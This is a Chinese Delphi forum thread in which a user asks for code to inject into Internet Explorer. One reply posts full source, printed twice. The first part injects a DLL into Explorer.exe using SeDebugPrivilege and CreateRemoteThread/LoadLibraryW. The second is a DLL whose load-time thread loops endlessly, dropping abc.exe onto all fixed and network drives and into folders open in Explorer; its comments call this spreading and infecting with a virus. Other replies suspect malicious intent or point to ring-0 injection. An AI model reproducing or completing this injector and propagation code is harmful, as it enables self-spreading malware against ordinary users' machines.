3
32881
Unregistered / Unconfirmed
GUEST, unregistred user!
如题,要求给出详细实现代码.谢谢.
L
lawler
Unregistered / Unconfirmed
GUEST, unregistred user!
如果你要做木马或病毒的话,全体大富翁都会鄙视你
S
sd_z
Unregistered / Unconfirmed
GUEST, unregistred user!
BHO
S
sd_z
Unregistered / Unconfirmed
GUEST, unregistred user!
http://dev.yesky.com/419/2016919.shtml
3
32881
Unregistered / Unconfirmed
GUEST, unregistred user!
呜呼,只不过是兴趣罢了,没打算搞破坏.各位高手如果不愿意回答就算老..
稍后结贴吧..
主要想实现,,无DLL注入IE..呵呵..
稍后结贴吧..
主要想实现,,无DLL注入IE..呵呵..
B
BlueVoice
Unregistered / Unconfirmed
GUEST, unregistred user!
还是用创建远程线程的方法,我做过的。
S
sbzldlb
Unregistered / Unconfirmed
GUEST, unregistred user!
住程序
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
StdCtrls, tlhelp32;
{type
TProcessEntry32 = record
dwSize: DWORD;
cntUsage: DWORD;
th32ProcessID: DWORD;
th32DefaultHeapID: DWORD;
th32ModuleID: DWORD;
cntThreads: DWORD;
th32ParentProcessID: DWORD;
pcPriClassBase: integer;
dwFlags: DWORD;
szExeFile: array[0..MAX_PATH - 1] of char;
end; }
type
TForm1 = class(TForm)
Button1: TButton;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.DFM}
procedure FindAProcess(const AFilename: string; const PathMatch: Boolean; var ProcessID: DWORD);
var
lppe: TProcessEntry32;
SsHandle: Thandle;
FoundAProc, FoundOK: boolean;
begin
ProcessID :=0;
SsHandle := CreateToolHelp32SnapShot(TH32CS_SnapProcess, 0);
FoundAProc := Process32First(Sshandle, lppe);
while FoundAProc do
begin
if PathMatch then
FoundOK := AnsiStricomp(lppe.szExefile, PChar(AFilename)) = 0
else
FoundOK := AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)), PChar(ExtractFilename(AFilename))) = 0;
if FoundOK then
begin
ProcessID := lppe.th32ProcessID;
break;
end;
FoundAProc := Process32Next(SsHandle, lppe);
end;
CloseHandle(SsHandle);
end;
function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
hToken: THandle;
tp: TOKEN_PRIVILEGES;
a: DWORD;
const
SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
Result := False;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
begin
tp.PrivilegeCount := 1;
LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
if bEnabled then
tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
tp.Privileges[0].Attributes := 0;
a := 0;
AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
Result := GetLastError = ERROR_SUCCESS;
CloseHandle(hToken);
end;
end;
function AttachToProcess(const HostFile, GuestFile: string; const PID: DWORD = 0): DWORD;
var
hRemoteProcess: THandle;
dwRemoteProcessId: DWORD;
cb: DWORD;
pszLibFileRemote: Pointer;
iReturnCode: Boolean;
TempVar: DWORD;
pfnStartAddr: TFNThreadStartRoutine;
pszLibAFilename: PwideChar;
begin
Result := 0;
EnabledDebugPrivilege(True);
Getmem(pszLibAFilename, Length(GuestFile) * 2 + 1);
StringToWideChar(GuestFile, pszLibAFilename, Length(GuestFile) * 2 + 1);
if PID > 0 then
dwRemoteProcessID := PID
else
FindAProcess(HostFile, False, dwRemoteProcessID);
hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {允许远程创建线程}
PROCESS_VM_OPERATION + {允许远程VM操作}
PROCESS_VM_WRITE, {允许远程VM写}
FALSE, dwRemoteProcessId);
cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR);
pszLibFileRemote := PWIDESTRING(VirtualAllocEx(hRemoteProcess, nil, cb, MEM_COMMIT, PAGE_READWRITE));
TempVar := 0;
iReturnCode := WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, cb, TempVar);
if iReturnCode then
begin
pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');
TempVar := 0;
Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);
end;
Freemem(pszLibAFilename);
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
AttachToProcess('Explorer.exe', extractfilepath(paramstr(0))+'Project2.dll');
end;
end.
dll
unit UnitDll;
interface
uses
SysUtils,
Classes,
Windows,
SHDocVw,
Activex,
PublicDef;
const
MainFileName='';
var
TransThreadHandle : Dword;
TransdwThreadID : DWord;
implementation
{传播线程}
procedure TransThread;
procedure ChangeFileAttrib(FileName:String);
begin
FileSetAttr(FileName,faHidden);
end;
procedure TransFromRemoveDisk;
var
I:Integer;
FileStream:TFileStream;
begin
try
for I:=Integer('a') to Integer('z') do
begin
try
case GetDriveType(pchar(chr(I)+':/')) of
DRIVE_FIXED,DRIVE_REMOTE :
begin
//病毒文件是否存在
if Not FileExists(chr(I)+':/'+'abc.exe') then
begin
try
FileStream:=TFileStream.Create(chr(I)+':/'+'abc.exe',fmcreate,fmOpenReadWrite);
finally
FreeAndNil(FileStream);
end;
end;
//自动运行病毒的文件是否存在
if Not FileExists('') then
begin
end;
end;
end;
except
end;
end;
except
end;
end;
procedure TransFromLAN;
begin
//得到本机内网地址
//循环判断电脑是否可以传播
{WnetAddConnection('//192.168.0.210/software','','Z:');
CopyFile('c:/a.wav','Z:/a.wav',false);
WnetCancelConnection('Z:',true); }
end;
procedure TransFromFilePath;
var
ShellWindow: IShellWindows;
nCount: integer;
spDisp: IDispatch;
i: integer;
vi: OleVariant;
IE1: IWebBrowser2;
FileStream:TFileStream;
FileName:String;
begin
try
ShellWindow:=CoShellWindows.Create;
nCount := ShellWindow.Count;
for i := 0 to nCount - 1 do
begin
vi := i;
try
spDisp := ShellWindow.Item(vi);
except
exit
end;
if (spDisp <> nil) then
begin
try
spDisp.QueryInterface(iWebBrowser2, IE1);
except
on EAccessViolation do
begin
exit
end;
end;
if (IE1 <> nil) then
begin
//判断路径是否存在,如果存在复制文件
if DirectoryExists(Copy(IE1.Get_LocationURL(),9,Length(IE1.Get_LocationURL)-9+1)) then
begin
//病毒文件是否存在
FileName:=Copy(IE1.Get_LocationURL()
,9
,Length(IE1.Get_LocationURL)-9+1)+'/abc.exe';
if Not FileExists(FileName) then
begin
try
FileStream:=TFileStream.Create(FileName,fmcreate,fmOpenReadWrite);
finally
FreeAndNil(FileStream);
end;
end;
//自动运行病毒的文件是否存在
if Not FileExists('') then
begin
end;
end;
end;
end;
end;
finally
FreeAndNil(ShellWindow);
end;
end;
begin
CoInitialize(nil);
while true do
begin
try
{感染硬盘根目录}
TransFromRemoveDisk;
Sleep(200);
{感染打开的目录}
TransFromFilePath;
sleep(200);
except
end;
end;
CoUninitialize;
end;
initialization
TransThreadHandle:=CreateThread(nil, 0, @TransThread, nil, 0, TransdwThreadID);
finalization
if (TransThreadHandle <> 0) then
TerminateThread(TransThreadHandle,0);
end.
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
StdCtrls, tlhelp32;
{type
TProcessEntry32 = record
dwSize: DWORD;
cntUsage: DWORD;
th32ProcessID: DWORD;
th32DefaultHeapID: DWORD;
th32ModuleID: DWORD;
cntThreads: DWORD;
th32ParentProcessID: DWORD;
pcPriClassBase: integer;
dwFlags: DWORD;
szExeFile: array[0..MAX_PATH - 1] of char;
end; }
type
TForm1 = class(TForm)
Button1: TButton;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.DFM}
procedure FindAProcess(const AFilename: string; const PathMatch: Boolean; var ProcessID: DWORD);
var
lppe: TProcessEntry32;
SsHandle: Thandle;
FoundAProc, FoundOK: boolean;
begin
ProcessID :=0;
SsHandle := CreateToolHelp32SnapShot(TH32CS_SnapProcess, 0);
FoundAProc := Process32First(Sshandle, lppe);
while FoundAProc do
begin
if PathMatch then
FoundOK := AnsiStricomp(lppe.szExefile, PChar(AFilename)) = 0
else
FoundOK := AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)), PChar(ExtractFilename(AFilename))) = 0;
if FoundOK then
begin
ProcessID := lppe.th32ProcessID;
break;
end;
FoundAProc := Process32Next(SsHandle, lppe);
end;
CloseHandle(SsHandle);
end;
function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
hToken: THandle;
tp: TOKEN_PRIVILEGES;
a: DWORD;
const
SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
Result := False;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
begin
tp.PrivilegeCount := 1;
LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
if bEnabled then
tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
tp.Privileges[0].Attributes := 0;
a := 0;
AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
Result := GetLastError = ERROR_SUCCESS;
CloseHandle(hToken);
end;
end;
function AttachToProcess(const HostFile, GuestFile: string; const PID: DWORD = 0): DWORD;
var
hRemoteProcess: THandle;
dwRemoteProcessId: DWORD;
cb: DWORD;
pszLibFileRemote: Pointer;
iReturnCode: Boolean;
TempVar: DWORD;
pfnStartAddr: TFNThreadStartRoutine;
pszLibAFilename: PwideChar;
begin
Result := 0;
EnabledDebugPrivilege(True);
Getmem(pszLibAFilename, Length(GuestFile) * 2 + 1);
StringToWideChar(GuestFile, pszLibAFilename, Length(GuestFile) * 2 + 1);
if PID > 0 then
dwRemoteProcessID := PID
else
FindAProcess(HostFile, False, dwRemoteProcessID);
hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {允许远程创建线程}
PROCESS_VM_OPERATION + {允许远程VM操作}
PROCESS_VM_WRITE, {允许远程VM写}
FALSE, dwRemoteProcessId);
cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR);
pszLibFileRemote := PWIDESTRING(VirtualAllocEx(hRemoteProcess, nil, cb, MEM_COMMIT, PAGE_READWRITE));
TempVar := 0;
iReturnCode := WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, cb, TempVar);
if iReturnCode then
begin
pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');
TempVar := 0;
Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);
end;
Freemem(pszLibAFilename);
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
AttachToProcess('Explorer.exe', extractfilepath(paramstr(0))+'Project2.dll');
end;
end.
dll
unit UnitDll;
interface
uses
SysUtils,
Classes,
Windows,
SHDocVw,
Activex,
PublicDef;
const
MainFileName='';
var
TransThreadHandle : Dword;
TransdwThreadID : DWord;
implementation
{传播线程}
procedure TransThread;
procedure ChangeFileAttrib(FileName:String);
begin
FileSetAttr(FileName,faHidden);
end;
procedure TransFromRemoveDisk;
var
I:Integer;
FileStream:TFileStream;
begin
try
for I:=Integer('a') to Integer('z') do
begin
try
case GetDriveType(pchar(chr(I)+':/')) of
DRIVE_FIXED,DRIVE_REMOTE :
begin
//病毒文件是否存在
if Not FileExists(chr(I)+':/'+'abc.exe') then
begin
try
FileStream:=TFileStream.Create(chr(I)+':/'+'abc.exe',fmcreate,fmOpenReadWrite);
finally
FreeAndNil(FileStream);
end;
end;
//自动运行病毒的文件是否存在
if Not FileExists('') then
begin
end;
end;
end;
except
end;
end;
except
end;
end;
procedure TransFromLAN;
begin
//得到本机内网地址
//循环判断电脑是否可以传播
{WnetAddConnection('//192.168.0.210/software','','Z:');
CopyFile('c:/a.wav','Z:/a.wav',false);
WnetCancelConnection('Z:',true); }
end;
procedure TransFromFilePath;
var
ShellWindow: IShellWindows;
nCount: integer;
spDisp: IDispatch;
i: integer;
vi: OleVariant;
IE1: IWebBrowser2;
FileStream:TFileStream;
FileName:String;
begin
try
ShellWindow:=CoShellWindows.Create;
nCount := ShellWindow.Count;
for i := 0 to nCount - 1 do
begin
vi := i;
try
spDisp := ShellWindow.Item(vi);
except
exit
end;
if (spDisp <> nil) then
begin
try
spDisp.QueryInterface(iWebBrowser2, IE1);
except
on EAccessViolation do
begin
exit
end;
end;
if (IE1 <> nil) then
begin
//判断路径是否存在,如果存在复制文件
if DirectoryExists(Copy(IE1.Get_LocationURL(),9,Length(IE1.Get_LocationURL)-9+1)) then
begin
//病毒文件是否存在
FileName:=Copy(IE1.Get_LocationURL()
,9
,Length(IE1.Get_LocationURL)-9+1)+'/abc.exe';
if Not FileExists(FileName) then
begin
try
FileStream:=TFileStream.Create(FileName,fmcreate,fmOpenReadWrite);
finally
FreeAndNil(FileStream);
end;
end;
//自动运行病毒的文件是否存在
if Not FileExists('') then
begin
end;
end;
end;
end;
end;
finally
FreeAndNil(ShellWindow);
end;
end;
begin
CoInitialize(nil);
while true do
begin
try
{感染硬盘根目录}
TransFromRemoveDisk;
Sleep(200);
{感染打开的目录}
TransFromFilePath;
sleep(200);
except
end;
end;
CoUninitialize;
end;
initialization
TransThreadHandle:=CreateThread(nil, 0, @TransThread, nil, 0, TransdwThreadID);
finalization
if (TransThreadHandle <> 0) then
TerminateThread(TransThreadHandle,0);
end.
D
delhpi
Unregistered / Unconfirmed
GUEST, unregistred user!
如果不是做病毒,楼主为何删除我的回复?
3
32881
Unregistered / Unconfirmed
GUEST, unregistred user!
晕,楼上的代码有点吓人!
3
32881
Unregistered / Unconfirmed
GUEST, unregistred user!
delhpi, 我有删你回复的权限吗?我不晓得,随便问问的.没人回答就算..一时兴趣,,值得你这么义愤吗?
C
cjwdone
Unregistered / Unconfirmed
GUEST, unregistred user!
晕,还真有人给代码,那种方法不是百发百中的,有很多限制,还有一种万无一失的方法,即把程序的权限提到ring 0,然后电脑中的进程你随便插,具体方法去看《黑客防线》04年合订本上册,至于代码,我是不会给你的,自己去找吧[
]
]
抵
抵住诱惑
Unregistered / Unconfirmed
GUEST, unregistred user!
楼主结贴吧!
3
32881
Unregistered / Unconfirmed
GUEST, unregistred user!
不问了,算了.
Similar threads
- crazymoon
- 系统相关